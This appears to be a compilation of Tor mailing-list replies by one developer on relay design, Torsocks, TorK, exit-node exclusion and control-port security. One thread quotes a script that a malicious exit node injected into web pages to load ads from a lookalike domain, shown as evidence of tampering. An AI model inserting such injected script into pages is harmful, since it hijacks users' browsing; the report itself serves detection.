Re: Scroogle and Tor
On Tuesday 15 February 2011 05:20:21 Mike Perry wrote: I was under the impression that we hacked it to also be memory-only, though. But you're right, if I toggle Torbutton to clear my cache, Polipo's is still there... The polipo shipped in the tor bundles has the cache turned off, but any non-Windows users will tend to use the polipo shipped by their distro - with caching turned on. *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: ExcludeNodes doesn't work right
On Thursday 30 April 2009 08:15:02 Scott Bennett wrote:
About a day ago, I added a list of obsolete nodes, mostly running
0.1.*.* releases, to my ExcludeNodes list in torrc. One of those was
TSL. I still see TSL being chosen for routes for circuits. I've
noticed such apparent violations and commented upon them previously
here.
What I don't yet know is whether I might be misunderstanding what
ExcludeNodes is supposed to do, based upon my understanding of the tor
man page, which says,
ExcludeNodes node,node,...
A list of identity fingerprints, nicknames, country codes and
address patterns of nodes to never use when building a circuit.
(Example: ExcludeNodes SlowServer, $ABCDEFFF, {cc},
255.254.0.0/8)
It seems to me that as soon as I send tor a SIGHUP after adding a node
to ExcludeNodes in torrc, tor ought to begin excluding it from future
path selections and ought also to remove it from its list of chosen
entry guards if it is in that list. If my understanding of what
ExcludeNodes is supposed to do is incorrect, I'd very much appreciate
someone letting me know and also some advice as to how to accomplish
real, immediate exclusion of the node from any new circuits established
by the client side of tor.
ExcludeNodes isn't respected by tor when building circuits for 'internal'
use, e.g. directory updates. If you can confirm that the nodes are being
chosen for circuits that are for the user's use then that would indicate a
problem.
I think the best way of tracking it would be to do:
telnet localhost 9051
authenticate
setevents extended circ stream
set excludenodes={your exclude nodes}
then watch/log the output. if you see 'purpose=general' against a stream on
a circuit containing an excluded route created after you set the
excludenodes then there may be a problem worth investigating. You could
post the suspect output here.
Thanks for any information on this matter.
Scott Bennett, Comm. ASMELG, CFIAG
**
* Internet: bennett at cs.niu.edu *
**
* A well regulated and disciplined militia, is at all times a good *
* objection to the introduction of that bane of all free governments *
* -- a standing army. *
*-- Gov. John Hancock, New York Journal, 28 January 1790 *
**
signature.asc
Description: This is a digitally signed message part.
Re: Tork - all tor versions lead to 0.2.1.7-alpha?
On Monday 08 December 2008 15:19:39 Praedor Atrebates wrote: I am wondering if anyone knows why Tork (0.29.2) seeks to download tor-0.2.1.7-alpha regardless of whether one asks it to check for the latest stable tor instead of the latest experimental tor. I see that the latest STABLE tor release appears to be 0.2.0.32, not 0.2.1.7-alpha. What gives? praedor a bug in the code. thanks for pointing it out. for future reference you can contact me directly with tork bugs/issues or use [EMAIL PROTECTED] I know that you've done both before, so just a reminder. signature.asc Description: This is a digitally signed message part.
Re: Excludenode not working?
On Sunday 07 December 2008 05:58:02 [EMAIL PROTECTED] wrote: Hi, In the Vidalia log file: Dec 06 05:14:45.484 [Warning] Requested exit node 'Ungoo5zie6raZeitheo' is in ExcludeNodes, or ExcludeExitNodes, using anyway. How is it possible? Thanks You have specified 'Ungoo5zie6raZeitheo' in your Exclude*Nodes configuration, but tor will continue to use such nodes for internal, house-keeping activity such as directory fetches. The exclusion only applies to circuits you use for your anonymous traffic. signature.asc Description: This is a digitally signed message part.
Re: Introducing Torsocks - Transparent socks for Tor
On Tuesday 11 November 2008 23:25:59 slush wrote: I found another problem in torsocks bash script. There is missing backslash in sed construction around . torsocks off. More in googlecode issue http://code.google.com/p/torsocks/issues/detail?id=1 Hi Slush, This issue is fixed in SVN now. Thanks for pointing it out.
Re: Torsocks on FreeBSD
On Saturday 15 November 2008 20:34:45 you wrote: I'm trying to set up Torsocks on FreeBSD. The configure script fails with the error libdl is required. From googling it looks like libdl is a part of glibc, but glibc isn't listed in ports. The FreeBSD mailing list archives mention that libc does an equivalent thing, but I don't know how to tell configure to use it. Sorry for the newbie question, but how do I get Torsocks to work with FreeBSD? Theres a Tsocks port so it shouldn't be too difficult... OK, I've fixed the libdl issue. Can you try: svn checkout http://torsocks.googlecode.com/svn/trunk/ torsocks-read-only and let me know how you get on? to build do: make -f Makefile.cvs ./configure make signature.asc Description: This is a digitally signed message part.
Re: Torsocks on FreeBSD
On Saturday 15 November 2008 20:34:45 Adlesshaven wrote: I'm trying to set up Torsocks on FreeBSD. The configure script fails with the error libdl is required. From googling it looks like libdl is a part of glibc, but glibc isn't listed in ports. The FreeBSD mailing list archives mention that libc does an equivalent thing, but I don't know how to tell configure to use it. Sorry for the newbie question, but how do I get Torsocks to work with FreeBSD? Theres a Tsocks port so it shouldn't be too difficult... It's on the TODO list: * Merge dsocks so we support BSD (http://monkey.org/~dugsong/dsocks/) Torsocks is linux-only at the moment unfortunately. signature.asc Description: This is a digitally signed message part.
Re: Introducing Torsocks - Transparent socks for Tor
On Monday 27 October 2008 19:04:38 Kyle Williams wrote: Very cool. How is this different than proxychains? It seems like they both do the same thing. I actually wasn't aware of proxychains, which looks like it was written about the same time as tsocks. You're right that they more or less do the same thing, and they more or less do it the same way - by using LD_PRELOAD to hook a program's calls for writing to and reading from the network, including DNS. Apart from the fact that proxychains allows you to chain your traffic through multiple proxies I think torsocks does the following 'extra' bits: - It supports some dns/network calls that proxychains does not, e.g. getpeerinfo. - It blocks primitive UDP calls by the application (to help prevent DNS leaks via UDP). - It supports the use of hidden services. I haven't looked at proxychains very closely and I have to confess I haven't even used it, but I *think* that is about it. On Sun, Oct 26, 2008 at 6:13 AM, Robert Hogan [EMAIL PROTECTED]wrote: Linux users may be familiar with the various patches for tsocks that make it safe for use with Tor. https://wiki.torproject.org/noreply/TheOnionRouter/TSocksPatches Torsocks takes all of the patches to tsocks listed at the link above: http://code.google.com/p/torsocks/source/browse/trunk#trunk/patches applies some other enhancements: http://code.google.com/p/torsocks/source/browse/trunk/ChangeLog and incorporates them into a new project: http://code.google.com/p/torsocks/ Torsocks allows you to use most socks-friendly applications in a safe way with Tor. Once you have installed torsocks, just launch it like so: usewithtor [application] So, for example you can use ssh to a some.ssh.com by doing: usewithtor ssh [EMAIL PROTECTED] or launch pidgin by doing: usewithtor pidgin You can download the current build at: http://torsocks.googlecode.com/files/torsocks-1.0-beta.tar.gz Torsocks is released under the GNU GPL licence v2. As far as I can make out this is compatible with the original tsocks and all subsequent patches. signature.asc Description: This is a digitally signed message part.
Introducing Torsocks - Transparent socks for Tor
Linux users may be familiar with the various patches for tsocks that make it safe for use with Tor. https://wiki.torproject.org/noreply/TheOnionRouter/TSocksPatches Torsocks takes all of the patches to tsocks listed at the link above: http://code.google.com/p/torsocks/source/browse/trunk#trunk/patches applies some other enhancements: http://code.google.com/p/torsocks/source/browse/trunk/ChangeLog and incorporates them into a new project: http://code.google.com/p/torsocks/ Torsocks allows you to use most socks-friendly applications in a safe way with Tor. Once you have installed torsocks, just launch it like so: usewithtor [application] So, for example you can use ssh to a some.ssh.com by doing: usewithtor ssh [EMAIL PROTECTED] or launch pidgin by doing: usewithtor pidgin You can download the current build at: http://torsocks.googlecode.com/files/torsocks-1.0-beta.tar.gz Torsocks is released under the GNU GPL licence v2. As far as I can make out this is compatible with the original tsocks and all subsequent patches. signature.asc Description: This is a digitally signed message part.
Re: Firewalled relays
On Saturday 04 October 2008 00:03:10 Martin Fick wrote: [..] To achieve this, firewalled relays would borrow an idea from hidden services and register rendezvous points with the directory servers. The rendezvous points would have to be with non-firewalled relays. Unlike hidden services though, these rendezvous points need not be 3 hops into the cloud, they need only be single hops. Upon startup, a firewalled relay would initiate and establish a connection to at least one non-firewalled relay and register that connection as a rendezvous point. On a pedantic note, I think you're referring to introduction points rather than rendezvous points here. The rendezvous points would only be used to tell firewalled relays that another relay or a client wanted to relay through the firewalled relay. Anyone wishing to establish a connection with a firewalled relay would contact them through the tor network as a client would making 3 hops before hitting the rendezvous point (this contact would be as anonymous as any other tor usage). Once a client or non-firewalled relay contacts a firewalled relay through the rendezvous point indicating its desire to relay through it, the firewalled relay will initiate a connection back to the relay or client asking to relay though it. From there on out the firewalled relay would behave as a regular relay. This means the client/router at the other end of the connection with the firewalled relay cannot be firewalled themselves. So firewalled relays can only act as middlemen and exit nodes under this design, or the client must have an open port the firewalled relay can connect to (which is probably not a safe assumption for a client). This limitation has a number of anonymity implications, similar to the ones described in this proposal: https://svn.torproject.org/cgi-bin/viewcvs.cgi/tor/trunk/doc/spec/proposals/133-unreachable-ors.txt?rev=15292view=markup The use of intro points seems like a very good idea on the face of it, and is probably better than the above proposal since it opens the firewalled relay to the entire network rather than just a segment of it. A few questions: 1. Should the identity of the firewalled relay and the router requesting access to it be concealed from the intro point? 2. How should the intro points for a firewalled relay be advertised? 3. Clients can't choose more than one firewalled relay in a circuit. What problems might this introduce? I'm sure there are more. Maybe the Tor developers can think of a show-stopper but you probably won't find it out unless you write up a proposal which goes into the idea in more detail and raises and adresses some of the problems it might create. With this design, any traffic using the firewalled relay would undergo a normal 3 hop path through the tor network just like other normal tor traffic. The rendezvous points would only be used to communicate desired connections but not to carry traffic. Setup time for connections would increase, but throughput should be unaffected. Thoughts? -Martin
Re: tortila as a bad exit
On Tuesday 12 August 2008 10:09:13 Drake Wilson wrote:
Quoth Scott Bennett [EMAIL PROTECTED], on 2008-08-11 23:30:20 -0500:
I'm not convinced. It hasn't taken any 300 circuits for me. It
seems to happen every time I have a circuit that exits via tortila. It
happens with every destination web page.
I can confirm this. I can't seem to find much pattern to it, though.
I did a simple wget test (no privoxy) and found fairly consistent insertions of
adsense spam to stevepavlima.com regardless of the site I targeted (google.*,
guardian.co.uk, irishtimes.com, cnn.com).
script type=text/javascriptvar
externalscript=http://pagead2.googlesyndication.stevepavlima.com/show_ads.js;;
document.write('script type=text/javascript src='+externalscript+'?'+new
Date() * 1+'\/script');/script
I found that using a regular browser the corruption appears infrequent
(caching,
browsers doing their best to make sense of gargabe), but the corruption is
consistent using wget. Where there was no insertion of stevepavlima.com (which
was rare) I just saw simple truncation.
Can anyone else confirm this?
signature.asc
Description: This is a digitally signed message part.
Re: tortila as a bad exit
On Tuesday 12 August 2008 11:29:56 Robert Hogan wrote:
On Tuesday 12 August 2008 10:09:13 Drake Wilson wrote:
Quoth Scott Bennett [EMAIL PROTECTED], on 2008-08-11 23:30:20 -0500:
I'm not convinced. It hasn't taken any 300 circuits for me. It
seems to happen every time I have a circuit that exits via tortila. It
happens with every destination web page.
I can confirm this. I can't seem to find much pattern to it, though.
I did a simple wget test (no privoxy) and found fairly consistent
insertions of adsense spam to stevepavlima.com regardless of the site I
targeted (google.*, guardian.co.uk, irishtimes.com, cnn.com).
script type=text/javascriptvar
externalscript=http://pagead2.googlesyndication.stevepavlima.com/show_ads.
js; document.write('script type=text/javascript
src='+externalscript+'?'+new Date() * 1+'\/script');/script
I found that using a regular browser the corruption appears infrequent
(caching, browsers doing their best to make sense of gargabe), but the
corruption is consistent using wget. Where there was no insertion of
stevepavlima.com (which was rare) I just saw simple truncation.
Can anyone else confirm this?
Ah, I see KT also found this in an earlier thread.
http://archives.seul.org/or/talk/Aug-2008/msg00054.html
signature.asc
Description: This is a digitally signed message part.
Re: email hidden service
On Monday 14 July 2008 11:07:16 Dawney Smith wrote: Karsten N. wrote: Are there any hidden service email services in existance? Yes: http://w6kb72k2phin5grc.onion/ (Onion Boxes, Etc) http://shells3nfdn3zk5h.onion/ (shells.onion) Thanks for the information. Out of interest, how did shells.onion manage to get a .onion address that starts shells ? That can't just be a coincidence surely? shallot: http://hangman5naigg7rr.onion/ which is unfortunately down for maintenance at the moment. And the tarball appears unavailable elsewhere. I can send you a copy if you're curious though. Just mail me directly. signature.asc Description: This is a digitally signed message part.
Re: OnionCat -- An IP-Transparent TOR Hidden Service Connector
On Tuesday 24 June 2008 21:01:27 Bernhard Fischer wrote: On Tuesday 24 June 2008, M. Peterson wrote: Hiho,, cool codings, does that mean, emule and torrent can run over tor now? Yes, with some limitations. OnionCat (currently) does not route packets. You can not forward packets to arbitrary destinations to onioncat, only those with destinations which are associated a hidden service. It is a hidden service connector and not an anonymizing network layer (currently). That means that people running TOR and OnionCat can share data with torrent/donkey/... together, anonymously, on top of OnionCat but you can not just mix it with some legacy Internet-Users. Was that not something, that was not desired? Not desired by who? File-sharing on the current Tor network is frowned upon because it conflicts with the presumed motivations of many of the volunteers who operate servers. That said, there is nothing stopping anyone else from creating their own parallel Tor network and distributing a tor bundle hardcoded with authority information for that network. (I know you know all this but bear with me.) So it would be easy to imagine a software bundle that comprises: 1. A modified Tor distribution for use on the file-sharing network. 2. Onioncat 3. A torrent distribution pre-configured with the ipv6 IP of the hidden service created during installation. This would then be the software client of a hidden-service/onioncat based sharing network. I'm sure may people would be interested in that, though I'm not sure performance would scale with the user base. I've often wondered why such a parallel network doesn't already exist, even without the advent of onioncat. How may Outproxies are then needed by the tor network? Sorry, don't know. Bernhard signature.asc Description: This is a digitally signed message part.
Re: How are hackers breaking Tor and trojan users?
On Wednesday 11 June 2008 06:17:38 Roger Dingledine wrote: snip He may also be referring to attacks where a local application (like the browser, but it doesn't have to be) can be tricked into connecting to your local Tor control port, like Kyle's attack from last year: http://archives.seul.org/or/announce/Sep-2007/msg0.html This was a great attack, but I think the latest versions of Torbutton and Vidalia make it a non-issue going forward. I would love to hear if you think otherwise. On a default Tor installation from source, i.e. with no authentication mechanism enabled, it is still possible successfully to send commands to the controlport if the 'authenticate' command is not preceded by any garbage. If someone were to develop a browser-based exploit that managed to get the 'authenticate', with no preceding bytes, to the controlport then they're in. I believe this is extremely difficult to do, and if such an attack was the subject of arrakis' and kyle's paper they would have much bigger fish to fry than just Tor. One way of preventing such an attack, however unlikely, would be to mandate a conversation such as: [EMAIL PROTECTED]:~$ telnet localhost 9051 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. Challenge is: 0a5f37d2edd284cb 0a5f37d2edd284cb 250 OK authenticate 250 OK In the above sequence the controller has had to inspect the challenge and parrot it back in order to be allowed issue an authenticate command. As far as I'm aware this would defeat a html-form based attack of the sort released last year, since such attacks cannot process feedback from the port they're attacking. signature.asc Description: This is a digitally signed message part.
Re: Aw: Re: Problem w/ Using tor(k) for Geostreaming Live-Videos
On Wednesday 11 June 2008 21:16:00 [EMAIL PROTECTED] wrote: Sorry, MY mistake: This is the live stream url: http://wgeostreaming.zdf.de/encoder/livestream15_h.asx It also got a Dsl2000 on www.zdf.de there 2! the first one is one of their videos and they are not geostream protected! But when you use tork with it do you see while it is being streamed that it is going thru tor or just the initial request! Am I right that when it is fully going thru tor one must constantly see the yellow pop-up video that tor is in usage.. In my case it seems to start with tor but then goes for the video straight there... Hence it does not work with the life video! Do not the browser also pass on the very url to the extern prgrom like mplayer, hence to tor issue ??? Hi Erich, [EMAIL PROTECTED]:~$ lynx -dump http://wgeostreaming.zdf.de/encoder/livestream15_h.asx ASX version = 3.0 Entry Ref href = rtsp://c36000-ls.w.core.cdn.streamfarm.net/2R38HDlo3/36000zdf/live/3546zdf/encoder.geozdf.geoevent_h.wmv / /Entry /ASX [EMAIL PROTECTED]:~$ torify mplayer -playlist rtsp://c36000-ls.w.core.cdn.streamfarm.net/2R38HDlo3/36000zdf/live/3546zdf/encoder.geozdf.geoevent_h.wmv Or you can click on the 'Anonymous Telnet Session' entry in the 'Anonymize' window and run the last command there. The last command failed for me because: rtsp://c36000-ls.w.core.cdn.streamfarm.net/2R38HDlo3/36000zdf/live/3546zdf/encoder.geozdf.geoevent_h.wmv. Not a Realmedia rtsp url. Trying standard rtsp protocol. RTSP support requires the LIVE.COM Streaming Media libraries! which I assume won't be a problem for you. Robert @Alex: THX 4 the score, but wished I could see it also NOW! - Original Nachricht Von: Alexander W. Janssen [EMAIL PROTECTED] An: or-talk@freehaven.net, [EMAIL PROTECTED] Datum: 11.06.2008 22:02 Betreff: Re: Problem w/ Using tor(k) for Geostreaming Live-Videos Works here with torify, though painfully slow. You might chose a stream which uses less bandwidth: $ ./torify mplayer -playlist http://wstreaming.zdf.de/zdf/veryhigh/080609_smm.asx ... STREAM_ASF, URL: mms://c36000-o.w.core.cdn.streamfarm.net/36000zdf/ondemand/3546zdf/zdf/zd f/0 8/06/080609_smm_vh.wmv Resolving c36000-o.w.core.cdn.streamfarm.net for AF_INET... Connecting to server c36000-o.w.core.cdn.streamfarm.net[217.243.250.24]: 1755... Connected ... By the way, Switzerland-Turkey 1:1 :-) Have fun, Alex. [EMAIL PROTECTED] schrieb: Hi there, here offers German Tv a live stream for soccer matches of the euro 2008! It is shielded by geostreaming! And even more, since due to some technical stuff on their side, not all German IPs are allowed accidentally.. Thus I need to use tor in order to become another German IP via an exit node, so that I can also watch them in real time! mplayer -playlist http_proxy://127.0.0.1:8118/http://wstreaming.zdf.de/zdf/veryhigh/080609_ smm .asx It seems that tor is checking out the url in the playlist file but then goes there straight without the proxy? I have tried also regular German public proxies like http://www.publicproxyservers.com/page1.html but no success either.. It is an rtsp stream after all, the live video... How can I run tor(k) so that I can view the games??? Erich PS: Please reply to the list and to my email address so that I can read the replies before the daily digest with the others topics of this list.. Jetzt komfortabel bei Arcor-Digital TV einsteigen: Mehr Happy Ends, mehr Herzschmerz, mehr Fernsehen! Erleben Sie 50 digitale TV Programme und optional 60 Pay TV Sender, einen elektronischen Programmführer mit Movie Star Bewertungen von TV Movie. Außerdem, aktuelle Filmhits und spannende Dokus in der Arcor-Videothek. Infos unter www.arcor.de/tv Jetzt komfortabel bei Arcor-Digital TV einsteigen: Mehr Happy Ends, mehr Herzschmerz, mehr Fernsehen! Erleben Sie 50 digitale TV Programme und optional 60 Pay TV Sender, einen elektronischen Programmführer mit Movie Star Bewertungen von TV Movie. Außerdem, aktuelle Filmhits und spannende Dokus in der Arcor-Videothek. Infos unter www.arcor.de/tv signature.asc Description: This is a digitally signed message part.
Re: Torbutton 1.2.0rc1 released
On Wednesday 04 June 2008 19:52:15 Curious Kid wrote: Thank you so much! Have you thought about having an option to set the initial starting state of TorButton? Mine starts in the state it was in when I last exited Firefox. That has led to me browsing to hidden services in the clear without initially realizing that Tor was not enabled. I am thinking that a radio button to select from Default (Starts in previous state), Starts Enabled, and Starts Disabled. I second this feature request! A command line argument would be ideal.. signature.asc Description: This is a digitally signed message part.
Re: Spoofing location - possible?
On Tuesday 06 May 2008 13:40:34 Geoffrey Goodell wrote: On Tue, May 06, 2008 at 07:04:38AM -0400, [EMAIL PROTECTED] wrote: Jamie McCarthy [EMAIL PROTECTED] said on May 05, 2008 12:38 -0400 (in part): Please forgive me for not doing more thorough research before emailing. I'm not part of the Tor community and not really interested in getting too into it. I'm just looking for some quick advice. I've done even less research than Jamie had for his question and I think have less technical background than he but ... I came to TOR looking not so much for the ability to surf anonymously but to convince my end target that I'm from a particular country. Primarily to allow use of streaming media (radio and video) from sites that restrict access to those from the United States. What you are looking for is a Perspective Access Network -- an overlay network that allows you to choose the perspective from which you want to access Internet services. Tor allows controllers such as Vidalia to determine exactly how circuits are built and which TCP streams are attached. However, to our knowledge nothing that gives you what you want in a useful way actually exists at this point. Fortunately, there is a project in the Vidalia project pipeline to build perspective choices (such as choosing the country in which you want your exit node to reside). Matt Edman and Camilo Viecco know more about this. Geoff Not strictly true, TorK provides exactly this option under the 'Citizen Of..' toolbar button. The snag is that TorK is linux-only at this point. signature.asc Description: This is a digitally signed message part.
Re: getting more exit nodes
On Sunday 27 April 2008 21:57:34 F. Fox wrote: Alexander Bernauer wrote: On Wed, Apr 23, 2008 at 07:51:51AM -0700, Martin Fick wrote: I really don't understand why pseudo-exit node anonymity is so important? The short answer: Admins who run a Tor node which is for good reasons not an exit node should be able to run at least a pseudo-exit node without additional personal risk. (snip) This is why I've got reject *.* - I feel that the level of risk is just too much for me, given the current state of things. That being said... I just don't understand this pseudo-exit thing, and could really use a clear set of documents (or better yet, something with diagrams), so I can get my brain around it. Basically: 1.) How can someone be an exit, without letting arbitrary users take on the identity of their IP? As soon as someone does that (as is with normal exits), they're open to crapstorms from anything bad anyone does... and I just don't understand how that can be avoided. 2.) If a pseudo-exit doesn't loan out its IP, it must be hiding it somehow - most likely through another proxy. How on Earth can that be an exit? Sorry, but I've just been confused from the beginning. Let's say I'm a client-exit and you're a pseudo-exit. This is how it works: 1. I boot up tor and start using it as a client. I also connect to your middleman and tell you that you can send anything you get my way. 2. You advertise yourself as a pseudo-exit in addition to being a middleman. 3. Other Tor clients select their client paths as normal and sometimes select your middleman as their exit. 4. When you receive such client traffic you immediately forward it to me. 5. I take it from you and forward the traffic to the real internet, as though it's coming from me. I route everything I get back to you. So this means: 1. I'm not a real exit and neither are you. 2. I'm your only gateway out of the Tor network. 3. Given that the connection between us is encrypted, nothing is leaving your box in the clear as it would if you were a real exit. 4. The relationship between the traffic that passes between us and what I pass on to the real internet would be fairly trivial to establish. 5. You are definitely not the garbage-in, garbage-out middleman you once were, since you can actually see what you're passing on to me. Thiis would be the red-light for most confirmed middlemen. 6. I'm not quite sure what I am, and I'm not sure I'd like to be me by default - especially since by definition under this scheme I'm a home user who is not even a listed tor node. I would not be happy if I was using Tor to post anonymously to a forum for a sensitive disease only to find my computer was requesting rather more sensitive pictures of ladies' ankles (in Nick's immortal phrase) without my knowledge . signature.asc Description: This is a digitally signed message part.
Re: getting more exit nodes
On Sunday 20 April 2008 12:32:19 Alexander Bernauer wrote: Hi The CCC local group Rheintal [1] is currently working on a solution to get much more Tor exit nodes which we think is a major problem of Tor. The basic idea is to develop a browser plugin which while active turns the computer into both an Tor client and a Tor exit node. The target group is a Windows XP or Vista user with almost no technical skills but fear of pop-ups asking strange things. We are experienced in providing and promoting security software to them [2] and we beliefe that this solution will be accepted and widely used. To get the software done I would like to discuss the technical aspects here. The bigest problem we see are those personal firewalls which prevent running a normal Tor server. Therefore this machine needs to open a client connection. That's why we call it a client-exit node. So we need some servers for the client-exit nodes. This nodes we call pseudo-exit nodes. The reason for this is that Alice selects this node as exit node for its circuit but the traffic gets routed to the client-exit node. So the pseudo-exit node doesn't appear in the server logs. This is an interesting idea - I submitted a proposal with broadly similar aims a little while ago. Though the approach was completely different. I suggest you write the idea up using the proposal format and post it to or-dev. That process will help you consider the security/anonymity implications of what you're suggesting. It will also reveal if there are any tricky implementation issues that need working out. A couple that occur to me: - Client traffic is being routed through an exit node that was not explicitly chosen by the client. Does this have any unintended consequences for anonymity? - Should pseudo-exits mark themselves as vanilla exits, or as something else? - What exit policy should they advertise? - How do the client-exits authenticate themselves to the pseudo-exit? Do they upload descriptors to the authorities? This means that every Tor node can become a pseudo-exit node without any additional law enforcement risks. Given that all Tor nodes are pseudo-exit nodes a client-exit node would select a Tor node at random and connect to it. As soon as a pseudo-exit node has at least one connection to a client-exit node it registers itself at the directory server as a normal exit node. From now on everything goes the normal way except that the pseudo exit nodes passes the traffic which would normally go out of the Tor network to the client-exit node. This is the basic idea. I'm sure there are technical aspects we missed or assumptions which are wrong. So I would appreciate if you could point us on them. We tried hard to find a solution which would not require patching existing Tor nodes. But we didn't find any. Maybe we do in this discussion. [1] http://ulm.ccc.de/Rheintal [2] http://www.dingens.org regards signature.asc Description: This is a digitally signed message part.
Re: Weird-looking circuits in Vidalia
On Tuesday 25 March 2008 21:05:49 you wrote: snip Ok, thanks for the info! How about replacing these strings with text like Directory Request in future? That would be be little more descriptive. I was thinking the same thing recently. I even went so far as to start a proposal - because there are numerous tunneled requests in Tor that aren't user initiated these days. I didn't get very far with it, and I'm not sure it's particularly straightforward in all cases. But it looks to be easy enough for these tunneled requests. Here's what I was thinking: Motivation/Overview: Tor now tunnels a large number of network maintenance operations through circuits on the Tor network. Many of these operations are not initiated by the user. Both TorK and Vidalia display active connections to the user and these maintenance operations may cause alarm, distress, and even panic if displayed without at least some attempt at explanation. If Tor were to provide a STREAM_PURPOSE string as an extension for the existing STREAM_EVENT controllers would be able to determine whether to display a stream to the user, or more likely provide a mechanism for explaining the purpose of the connection to the curious user. Specify a new PURPOSE field for extended stream events as follows: Index: doc/spec/control-spec.txt === --- doc/spec/control-spec.txt (revision 14111) +++ doc/spec/control-spec.txt (working copy) @@ -984,6 +984,7 @@ 650 SP STREAM SP StreamID SP StreamStatus SP CircID SP Target [SP REASON= Reason [ SP REMOTE_REASON= Reason ]] [SP SOURCE= Source] [ SP SOURCE_ADDR= Address : Port ] + [SP PURPOSE= Reason] CRLF StreamStatus = @@ -1033,6 +1034,13 @@ that requested the connection, and can be (e.g.) used to look up the requesting program. + Purpose = DIR_FETCH / UPLOAD_DESC / DNS_REQUEST / + USER / DIRPORT_TEST + + The PURPOSE field is provided only for NEW and NEWRESOLVE + events, and only if extended events are enabled (see 3.19). Clients MUST + accept purposes not listed above. + signature.asc Description: This is a digitally signed message part.
Proposal: Incorporate Unreachable ORs into the Tor Network
I'm not sure how much merit this proposal has, or how serious it's problems are. Does anyone have any thoughts on it? Are the problems I've outlined fatal, or is there a problem with it I've missed? I suspect one or the other. -- Filename: xxx-unreachable-ORs.txt Title: Incorporate Unreachable ORs into the Tor Network Author: Robert Hogan Created: 2008-03-08 Status: Draft Overview: Propose a scheme for harnessing the bandwidth of ORs who cannot currently participate in the Tor network because they can only make outbound TCP connections. Motivation: Restrictive local and remote firewalls are preventing many willing candidates from becoming ORs on the Tor network.These ORs have a casual interest in joining the network but their operator is not sufficiently motivated or adept to complete the necessary router or firewall configuration. The Tor network is losing out on their bandwidth. At the moment we don't even know how many such 'candidate' ORs there are. Objective: 1. Establish how many ORs are unable to qualify for publication because they cannot establish that their ORPort is reachable. 2. Devise a method for making such ORs available to clients for circuit building without prejudicing their anonymity. Proposal: ORs whose ORPort reachability testing fails a specified number of consecutive times should: 1. Enlist themselves with the authorities setting a 'Fallback' flag. This flag indicates that the OR is up and running but cannot connect to itself. 2. Open an orconn with all ORs whose fingerprint begins with the same byte as their own. The management of this orconn will be transferred entirely to the OR at the other end. 2. The fallback OR should update it's router status to contain the 'Running' flag if it has managed to open an orconn with 3/4 of the ORs with an FP beginning with the same byte as its own. Tor ORs who are contacted by fallback ORs requesting an orconn should: 1. Accept the orconn until they have reached a defined limit of orconn connections with fallback ORs. 2. Should only accept such orconn requests from listed fallback ORs who have an FP beginning with the same byte as its own. Tor clients can include fallback ORs in the network by doing the following: 1. When building a circuit, observe the fingerprint of each node they wish to connect to. 2. When randomly selecting a node from the set of all eligible nodes, add all published, running fallback nodes to the set where the first byte of the fingerprint matches the previous node in the circuit. Anonymity Implications: At least some, and possibly all, nodes on the network will have a set of nodes that only they and a few others can build circuits on. 1. This means that fallback ORs might be unsuitable for use as middlemen nodes, because if the exit node is the attacker it knows that the number of nodes that could be the entry guard in the circuit is reduced to roughly 1/256th of the network, or worse 1/256th of all nodes listed as Guards. For the same reason, fallback nodes would appear to be unsuitable for two-hop circuits. 2. This is not a problem if fallback ORs are always exit nodes. If the fallback OR is an attacker it will not be able to reduce the set of possible nodes for the entry guard any further than a normal, published OR. Possible Attacks/Open Issues: 1. Gaming Node Selection Does running a fallback OR customized for a specific set of published ORs improve an attacker's chances of seeing traffic from that set of published ORs? Would such a strategy be any more effective than running published ORs with other 'attractive' properties? 2. DOS Attack An attacker could prevent all other legitimate fallback ORs with a given byte-1 in their FP from functioning by running 20 or 30 fallback ORs and monopolizing all available fallback slots on the published ORs. This same attacker would then be in a position to monopolize all the traffic of the fallback ORs on that byte-1 network segment. I'm not sure what this would allow such an attacker to do. 4. Circuit-Sniffing An observer watching exit traffic from a fallback server will know that the previous node in the circuit is one of a very small, identifiable subset of the total ORs in the network. To establish the full path of the circuit they would only have to watch the exit traffic from the fallback OR and all the traffic from the 20 or 30 ORs it is likely to be connected to. This means it is substantially easier to establish all members of a circuit which has a fallback OR as an exit (sniff and analyse 10-50 (i.e. 1/256 varying) + 1 ORs) rather than a normal published OR (sniff all 2560 or so ORs on the network). The same mechanism that allows the client to expect a specific
Re: Invalid uptime warning messages
On Sunday 17 February 2008 10:56:28 Olaf Selke wrote: Scott Bennett wrote: At 10:00 p.m. my tor server began issuing a warning message about a negative uptime: yep, the same here on blutmagie. TZ is UTC+1 Feb 17 04:40:45.116 [warn] Invalid uptime -19907 The affected router appears to be 'crobertp'. It has the invalid uptime value in it's router descriptor: signature.asc Description: This is a digitally signed message part.
Re: Invalid uptime warning messages
On Sunday 17 February 2008 12:10:40 Robert Hogan wrote: On Sunday 17 February 2008 10:56:28 Olaf Selke wrote: Scott Bennett wrote: At 10:00 p.m. my tor server began issuing a warning message about a negative uptime: yep, the same here on blutmagie. TZ is UTC+1 Feb 17 04:40:45.116 [warn] Invalid uptime -19907 The affected router appears to be 'crobertp'. It has the invalid uptime value in it's router descriptor: 250+desc/name/crobertp= router crobertp 201.51.22.53 563 0 9030 platform Tor 0.1.1.24 on Linux i686 published 2008-02-17 09:03:34 opt fingerprint 3D18 77CA 3BBD 97A5 9D38 0640 6696 E692 420B EF67 uptime -19907 bandwidth 20480 51200 0 I've bcc'd the owner of the router so he can upgrade his Tor (0.1.1.24 must be deprecated by now). signature.asc Description: This is a digitally signed message part.
Re: How to remove some useless nodes
On Monday 28 January 2008 18:34:52 F. Fox wrote: 孙超 wrote: We in China use tor mainly for avoiding Great Fire Wall, which is a very strong internet censorship software operated by the government. So, if linkage with nodes within China is completely useless for us to break the censorship. Usually, we can cut off such connection in tor's graphic window vidalia manually, but it very bothering, we must keep an eye on whether there is linkage within China. I wonder if there is some way to remove nodes located in China. Although I'm not in a country like China, nor do I know a solution, do know that I support any effort which makes Tor a better tool for circumventing the Great Firewall. The ability to exclude nodes by [approximate] geography would be a nice feature; taking a look at TorStatus, I notice that the nodes (including my own) are already identified with their country of origin. This isn't the first time I've plugged this feature of TorK and it probably won't be the last. Some of you seem to be Linux users, so this is just to let you know if you install TorK you can exclude routers on the basis of country code with a couple of clicks. The caveat is that the identification of the router's country of origin is only as good as the maxmind geoip db - which is fairly reliable in 99.X% of cases. http://tork.anonymityanywhere.com signature.asc Description: This is a digitally signed message part.
Re: filesharing with tor and offsystem online storage
